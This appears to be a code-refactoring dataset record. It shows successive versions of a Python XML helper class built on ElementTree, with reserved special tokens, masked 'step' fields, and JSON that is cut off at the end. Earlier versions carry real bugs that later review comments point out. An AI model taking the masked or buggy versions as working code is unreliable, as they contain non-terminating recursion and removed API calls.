self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):
xmlStr = xmlStr.replace('\n', '')
xmlStruct1 = self.__analyNodeFlag(xmlStr)
if xmlStruct1 != None:
xmlNode1 = xmlStruct1[0]
xmlRestStr1 = xmlStruct1[1]
xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)
xmlNode2 = xmlStruct2[0]
xmlRestStr2 = xmlStruct2[1]
xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)
xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]
isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)
nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)
nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)
if not nodeName1 in nodeList:
nodeList.append(nodeName1)
if not nodeName2 in nodeList:
nodeList.append(nodeName2)
nodeName1Floor = nodeList.index(nodeName1, 0)
nodeName2Floor = nodeList.index(nodeName2, 0)
space = ''
if len(xmlNode1) > 0:
if isPair:
for index in range(nodeName1Floor):
xmlNode1 = space + xmlNode1
fileWrite.write(xmlNode1 + '\n')
if len(xmlInnerText) > 0:
if isPair:
for index in range(nodeName1Floor + 1):
xmlInnerText = space + xmlInnerText
fileWrite.write(xmlInnerText + '\n')
if len(xmlNode2) > 0:
for index in range(nodeName2Floor):
xmlNode2 = space + xmlNode2
fileWrite.write(xmlNode2 + '\n')
self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self, str):
str = str[1:len(str) - 1]
nodeName = str.replace('/', '')
return nodeName
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
_exception = None
<|reserved_special_token_0|>
class xmlSp:
    """Thin helper around xml.etree.ElementTree: load, query, modify and
    pretty-print XML.  Errors are reported by storing the exception in the
    module-level `_exception` and returning False/None rather than raising.
    """

    def addNode(self, parentNode, childNode):
        # Append childNode as the last child of parentNode.
        parentNode.append(childNode)

    def createChildNode(self, key, value, propertyMap={}):
        # Build a detached Element named `key` with text `value` and the
        # given attribute map.
        # NOTE(review): mutable default argument -- safe only while callers
        # never mutate the shared default dict.
        element = Element(key, propertyMap)
        element.text = value
        return element

    def fetchXmlNodeTree(self, xmlPathOrXmlStr):
        # Load XML from either a file path or a raw XML string.
        # Returns an ElementTree for a path, an Element for a string,
        # or None for empty input.
        if xmlPathOrXmlStr == '':
            return None
        elif os.path.isfile(xmlPathOrXmlStr):
            return ElementTree.parse(xmlPathOrXmlStr)
        else:
            return ElementTree.fromstring(xmlPathOrXmlStr)

    def fetchSingleNode(self, nodeTree, xpathOrKey):
        # Return the first node matching an XPath ('a/b') or a bare tag name.
        # NOTE(review): Element.getiterator() was removed in Python 3.9;
        # iter() is the modern equivalent -- confirm target interpreter.
        # NOTE(review): when a bare tag matches nothing this returns the
        # empty list itself, not None; callers must treat both as "missing".
        if xpathOrKey == None or xpathOrKey == '':
            return None
        elif len(xpathOrKey.split('/')) > 1:
            return nodeTree.find(xpathOrKey)
        else:
            nodeList = nodeTree.getiterator(xpathOrKey)
            if nodeList == None or len(nodeList) <= 0:
                return nodeList
            else:
                return nodeList[0]

    def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
        # Return the text of the first matching node, or '' when absent.
        # NOTE(review): len(node) counts CHILD elements, so a leaf element
        # that has text but no children also falls into the '' branch --
        # looks like a bug; verify intended behaviour.
        node = self.fetchSingleNode(nodeTree, xpathOrKey)
        if node == None or len(node) <= 0 or node == '':
            return ''
        else:
            return node.text

    def fetchNodeList(self, nodeTree, xpathOrKey):
        # Return every node matching an XPath ('a/b') or a bare tag name.
        if xpathOrKey == None or xpathOrKey == '':
            return None
        elif len(xpathOrKey.split('/')) > 1:
            return nodeTree.findall(xpathOrKey)
        else:
            return nodeTree.getiterator(xpathOrKey)

    def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
        # Return the text of every node whose tag equals xpathOrKey exactly.
        # NOTE(review): because of that tag comparison, XPath inputs yield an
        # empty result; the unused `key` parameter was presumably intended
        # for that case -- confirm against callers.
        if xpathOrKey == None or xpathOrKey == '':
            return None
        else:
            nodeValueList = []
            nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
            for node in nodeList:
                if node.tag == xpathOrKey:
                    nodeValueList.append(node.text)
            return nodeValueList

    def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
        # Pretty-print sourceXmlPath into destXmlPath, one node per line,
        # indented by nesting depth.  Returns True on success; on failure
        # stores the exception in module-level _exception and returns False.
        global _exception
        _exception = None
        if os.path.exists(sourceXmlPath):
            try:
                fileRead = open(sourceXmlPath, 'r', encoding=charset)
                fileWrite = open(destXmlPath, 'w', encoding=charset)
                lines = fileRead.read()
                nodeList = []
                self.__writeXmlStruct(lines, nodeList, fileWrite)
                fileRead.close()
                fileWrite.close()
                return True
            except BaseException as error:
                _exception = error
                return False
        else:
            _exception = BaseException('File not exist!')
            return False

    def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):
        # Recursively peel one "<open>text</close>" pair off the front of
        # xmlStr per call and write it out indented by the tag's depth.
        # nodeList doubles as the depth table: a tag's first-seen index in
        # the list is used as its indent level.
        xmlStr = xmlStr.replace('\n', '')
        xmlStruct1 = self.__analyNodeFlag(xmlStr)
        if xmlStruct1 != None:
            xmlNode1 = xmlStruct1[0]
            xmlRestStr1 = xmlStruct1[1]
            xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)
            xmlNode2 = xmlStruct2[0]
            xmlRestStr2 = xmlStruct2[1]
            # Inner text is whatever sits between the two tags just parsed.
            xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)
            xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]
            isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)
            nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)
            nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)
            if not nodeName1 in nodeList:
                nodeList.append(nodeName1)
            if not nodeName2 in nodeList:
                nodeList.append(nodeName2)
            nodeName1Floor = nodeList.index(nodeName1, 0)
            nodeName2Floor = nodeList.index(nodeName2, 0)
            # NOTE(review): space is the empty string, so the indentation
            # loops below currently prepend nothing -- presumably meant to
            # be spaces or a tab; confirm intended output.
            space = ''
            if len(xmlNode1) > 0:
                if isPair:
                    for index in range(nodeName1Floor):
                        xmlNode1 = space + xmlNode1
                fileWrite.write(xmlNode1 + '\n')
            if len(xmlInnerText) > 0:
                if isPair:
                    for index in range(nodeName1Floor + 1):
                        xmlInnerText = space + xmlInnerText
                fileWrite.write(xmlInnerText + '\n')
            if len(xmlNode2) > 0:
                for index in range(nodeName2Floor):
                    xmlNode2 = space + xmlNode2
                fileWrite.write(xmlNode2 + '\n')
            # Recurse on whatever text follows the closing tag.
            self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)

    def __analyNodeFlag(self, sourceStr):
        # Split sourceStr into [first '<...>' tag, remainder after it].
        # Returns ['', sourceStr] when no complete tag is present; returns
        # None only if an exception occurred (recorded in _exception).
        global _exception
        _exception = None
        try:
            nodeBegin = sourceStr.find('<')
            nodeEnd = str(sourceStr).find('>')
            if nodeBegin >= 0 and nodeEnd > 0:
                node = sourceStr[nodeBegin:nodeEnd + 1]
                nodeInnerText = sourceStr[nodeEnd + 1:]
                return [node, nodeInnerText]
            else:
                return ['', sourceStr]
        except BaseException as error:
            _exception = error
            return None

    def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
        # True when the two tags look like an open/close pair of one name.
        # NOTE(review): the [1:len-2] slice drops the final character of the
        # tag name as well as '>', so names differing only in their last
        # character compare equal -- verify against expected inputs.
        if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
            nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
            nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
            nodeFlag1 = nodeFlag1.replace('/', '')
            nodeFlag2 = nodeFlag2.replace('/', '')
            if nodeFlag1 == nodeFlag2:
                return True
        return False

    def __fetchNodeNameFromStr(self, str):
        # Strip '<', '>' and any '/' to recover the bare tag name.
        # NOTE(review): the parameter shadows the builtin `str`.
        str = str[1:len(str) - 1]
        nodeName = str.replace('/', '')
        return nodeName

    def modifyNodeValue(self, node, newValue, isAppend=False):
        # Set (or, with isAppend, concatenate onto) node.text.  Returns
        # False for a None node or on any error (e.g. appending when the
        # existing text is None).
        if node == None:
            return False
        else:
            try:
                if isAppend:
                    node.text += newValue
                else:
                    node.text = newValue
                return True
            except:
                return False

    def writeXml(self, nodeTree, outPath, charset='utf-8'):
        # Serialize the tree to outPath; True on success, False with the
        # error stored in module-level _exception on failure.
        global _exception
        _exception = None
        try:
            nodeTree.write(outPath, encoding=charset)
            return True
        except BaseException as error:
            _exception = error
            return False
<|reserved_special_token_1|>
#-*- coding:utf-8 -*-
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
_exception = None
import os
class xmlSp:
    """Thin convenience wrapper around ``xml.etree.ElementTree``.

    Provides helpers to load, query, modify, format and write XML.
    Methods that can fail store the error in the module-level
    ``_exception`` global and return False/None instead of raising.
    """

    def addNode(self, parentNode, childNode):
        """Append *childNode* as the last child of *parentNode*."""
        parentNode.append(childNode)

    def createChildNode(self, key, value, propertyMap=None):
        """Create a new element named *key* with text *value* and attributes *propertyMap*."""
        # None-sentinel instead of a mutable default dict argument.
        element = Element(key, propertyMap if propertyMap is not None else {})
        element.text = value
        return element

    def fetchXmlNodeTree(self, xmlPathOrXmlStr):
        """Load XML from a file path or a raw XML string.

        Returns an ``ElementTree`` for a file path, the root ``Element``
        for a string, or None for empty input.
        """
        if xmlPathOrXmlStr == "":
            return None
        if os.path.isfile(xmlPathOrXmlStr):  # treat as a path on disk
            return ElementTree.parse(xmlPathOrXmlStr)
        return ElementTree.fromstring(xmlPathOrXmlStr)  # treat as raw XML

    def fetchSingleNode(self, nodeTree, xpathOrKey):
        """Return the first node matching *xpathOrKey*.

        *xpathOrKey* is treated as an XPath when it contains '/',
        otherwise as a plain tag name searched through the whole tree.
        """
        if xpathOrKey is None or xpathOrKey == "":
            return None
        if len(xpathOrKey.split('/')) > 1:  # XPath
            return nodeTree.find(xpathOrKey)  # find() already returns only the first match
        # Element.getiterator() was removed in Python 3.9; iter() is the replacement.
        nodeList = list(nodeTree.iter(xpathOrKey))
        if len(nodeList) <= 0:
            return nodeList  # historical behaviour: empty list (not None) when nothing matches
        return nodeList[0]

    def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
        """Return the text of the first matching node, or '' when there is no match or no text."""
        node = self.fetchSingleNode(nodeTree, xpathOrKey)
        # fetchSingleNode returns None / an empty list when nothing matched.
        # Bug fix: the old check `len(node) <= 0` also rejected matched leaf
        # elements (an Element's len() counts children), so a leaf's text was
        # never returned.
        if node is None or isinstance(node, list):
            return ""
        return node.text if node.text is not None else ""

    def fetchNodeList(self, nodeTree, xpathOrKey):
        """Return a list of all nodes matching *xpathOrKey* (XPath if it contains '/', else a tag name)."""
        if xpathOrKey is None or xpathOrKey == "":
            return None
        if len(xpathOrKey.split('/')) > 1:  # XPath
            return nodeTree.findall(xpathOrKey)
        # getiterator() was removed in Python 3.9; materialise iter() into a list.
        return list(nodeTree.iter(xpathOrKey))

    def fetchNodeValueList(self, nodeTree, xpathOrKey, key=""):
        """Return the text of every matching node.

        When *xpathOrKey* is an XPath, pass the tag name of the matched
        nodes in *key* (as the original docstring required); for a plain
        tag name *key* may be left empty.
        """
        if xpathOrKey is None or xpathOrKey == "":
            return None
        # Bug fix: `key` used to be ignored, so the XPath variant always
        # returned an empty list (a full XPath never equals a node's tag).
        wanted = key if key else xpathOrKey
        nodeValueList = []
        for node in self.fetchNodeList(nodeTree, xpathOrKey):
            if node.tag == wanted:
                nodeValueList.append(node.text)
        return nodeValueList

    def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
        """Rewrite *sourceXmlPath* into *destXmlPath* with one tag / text chunk per line.

        Returns True on success; on failure stores the error in the module
        global ``_exception`` and returns False.
        """
        global _exception
        _exception = None
        if not os.path.exists(sourceXmlPath):
            _exception = BaseException('File not exist!')
            return False
        try:
            # `with` guarantees both handles are closed even on failure
            # (the original leaked them on any exception).
            with open(sourceXmlPath, 'r', encoding=charset) as fileRead, \
                    open(destXmlPath, 'w', encoding=charset) as fileWrite:
                self.__writeXmlStruct(fileRead.read(), [], fileWrite)
            return True
        except BaseException as error:
            _exception = error
            return False

    def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):
        """Recursively emit tag markers and inner text, one per line.

        Each call consumes two tag markers and recurses on the remainder.
        NOTE(review): text lying between one call's second marker and the
        next call's first marker is dropped by __analyNodeFlag — kept as-is
        to preserve the original output.
        """
        xmlStr = xmlStr.replace('\n', '')
        if xmlStr == '':
            # Bug fix: without a base case the recursion never terminated,
            # so format() always failed with a RecursionError.
            return
        xmlStruct1 = self.__analyNodeFlag(xmlStr)
        if xmlStruct1 is None:
            return
        xmlNode1, xmlRestStr1 = xmlStruct1
        xmlNode2, xmlRestStr2 = self.__analyNodeFlag(xmlRestStr1)
        if xmlNode1 == '' and xmlNode2 == '':
            # Bug fix: no tag markers left — stop instead of recursing forever.
            return
        xmlInnerText = xmlRestStr1[:xmlRestStr1.find(xmlNode2)]
        isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)
        nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)
        nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)
        if nodeName1 not in nodeList:
            nodeList.append(nodeName1)
        if nodeName2 not in nodeList:
            nodeList.append(nodeName2)
        nodeName1Floor = nodeList.index(nodeName1)
        nodeName2Floor = nodeList.index(nodeName2)
        # NOTE(review): `space` is empty, so the indentation below is a
        # no-op; kept verbatim to preserve the original output exactly.
        space = ''
        if len(xmlNode1) > 0:
            if isPair:
                xmlNode1 = space * nodeName1Floor + xmlNode1
            fileWrite.write(xmlNode1 + '\n')
        if len(xmlInnerText) > 0:
            if isPair:
                xmlInnerText = space * (nodeName1Floor + 1) + xmlInnerText
            fileWrite.write(xmlInnerText + '\n')
        if len(xmlNode2) > 0:
            xmlNode2 = space * nodeName2Floor + xmlNode2
            fileWrite.write(xmlNode2 + '\n')
        self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)

    def __analyNodeFlag(self, sourceStr):
        """Split *sourceStr* into [first '<...>' marker, text after it].

        Returns ['', sourceStr] when no complete marker is present and
        None (with ``_exception`` set) on error. NOTE(review): text before
        the first '<' is discarded by the marker branch.
        """
        global _exception
        _exception = None
        try:
            nodeBegin = sourceStr.find('<')
            nodeEnd = sourceStr.find('>')
            if nodeBegin >= 0 and nodeEnd > 0:
                return [sourceStr[nodeBegin:nodeEnd + 1], sourceStr[nodeEnd + 1:]]
            return ['', sourceStr]
        except BaseException as error:
            _exception = error
            return None

    def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
        """Return True when the two markers open and close the same tag (e.g. '<a>' and '</a>')."""
        if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
            # Bug fix: the original sliced [1:len-2], dropping the last
            # character of each tag name, so '<ab>' paired with '</ac>'.
            name1 = nodeFlag1[1:-1].replace('/', '')
            name2 = nodeFlag2[1:-1].replace('/', '')
            if name1 == name2:
                return True
        return False

    def __fetchNodeNameFromStr(self, str):
        """Extract the bare tag name from a '<tag>' or '</tag>' marker."""
        # (parameter name `str` kept for interface compatibility)
        return str[1:len(str) - 1].replace('/', '')

    def modifyNodeValue(self, node, newValue, isAppend=False):
        """Set (or append to, when *isAppend*) the text of *node*; return success.

        Appending when the current text is None raises internally and
        yields False, matching the original behaviour.
        """
        if node is None:
            return False
        try:
            if isAppend:
                node.text += newValue
            else:
                node.text = newValue
            return True
        except Exception:
            return False

    def writeXml(self, nodeTree, outPath, charset="utf-8"):
        """Serialise *nodeTree* to *outPath*; return success, storing errors in ``_exception``."""
        global _exception
        _exception = None
        try:
            nodeTree.write(outPath, encoding=charset)
            return True
        except BaseException as error:
            _exception = error
            return False
#import os
#if __name__ == '__main__':
# myxml = xmlSp()
# formatResult = myxml.format("1.txt","2.txt")
# if not formatResult:
# print(_exception)
# else:
# os.remove("1.txt")
# os.rename('2.txt','1.txt')
## xmlPath= "..\\article\\articleList.xml";
## nodeTree = myxml.fetchXmlNodeTree(xmlPath)
## #nodeTree=
## #myxml.fetchXmlNodeTree("<artilceList><article><id>aaaa</id></article></artilceList>")
## #node=myxml.fetchSingleNode(nodeTree,'article/id')
## #if len(node)<=0:
## # print("empty")
## #print(node)
## #nodeList = myxml.fetchNodeList(nodeTree,'id')
## #myxml.modifyNodeValue(nodeList[0],'bbbb')
## #myxml.writeXml(nodeTree,xmlPath)
## #rootNode=myxml.fetchSingleNode(nodeTree,'articleList')
## #idNode=myxml.createChildNode('id','aaabbbb')
## #nameNode=myxml.createChildNode('name','aaabbbb')
## #parentNode=myxml.createChildNode('article','')
## #myxml.addNode(parentNode,idNode)
## #myxml.addNode(parentNode,nameNode)
## #myxml.addNode(rootNode,parentNode)
## #myxml.writeXml(nodeTree,'aaa.xml')
## #for node in nodeList:
## # print("node:%s" %node)
## #nodeValueSet=fetchNodeValueSet(nodeTree,'article/id')
## #for nodeValue in nodeValueSet:
## # print ("nodeValue:%s" %nodeValue)
#import os
#os.system("PAUSE")
|
flexible
|
{
"blob_id": "0470f98247f8f835c0c052b01ddd7f1f7a515ab5",
"index": 5509,
"step-1": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n <mask token>\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n <mask token>\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = 
None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n <mask token>\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-2": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n <mask token>\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n <mask token>\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = 
None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-3": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n\n def fetchXmlNodeTree(self, xmlPathOrXmlStr):\n if xmlPathOrXmlStr == '':\n return None\n elif os.path.isfile(xmlPathOrXmlStr):\n return ElementTree.parse(xmlPathOrXmlStr)\n else:\n return ElementTree.fromstring(xmlPathOrXmlStr)\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except 
BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n\n def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):\n xmlStr = xmlStr.replace('\\n', '')\n xmlStruct1 = self.__analyNodeFlag(xmlStr)\n if xmlStruct1 != None:\n xmlNode1 = xmlStruct1[0]\n xmlRestStr1 = xmlStruct1[1]\n xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)\n xmlNode2 = xmlStruct2[0]\n xmlRestStr2 = xmlStruct2[1]\n xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)\n xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]\n isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)\n nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)\n if not nodeName1 in nodeList:\n nodeList.append(nodeName1)\n if not nodeName2 in nodeList:\n nodeList.append(nodeName2)\n nodeName1Floor = nodeList.index(nodeName1, 0)\n nodeName2Floor = nodeList.index(nodeName2, 0)\n space = ''\n if len(xmlNode1) > 0:\n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1 = space + xmlNode1\n fileWrite.write(xmlNode1 + '\\n')\n if len(xmlInnerText) > 0:\n if isPair:\n for index in range(nodeName1Floor + 1):\n xmlInnerText = space + xmlInnerText\n fileWrite.write(xmlInnerText + '\\n')\n if len(xmlNode2) > 0:\n for index in range(nodeName2Floor):\n xmlNode2 = space + xmlNode2\n fileWrite.write(xmlNode2 + '\\n')\n self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 
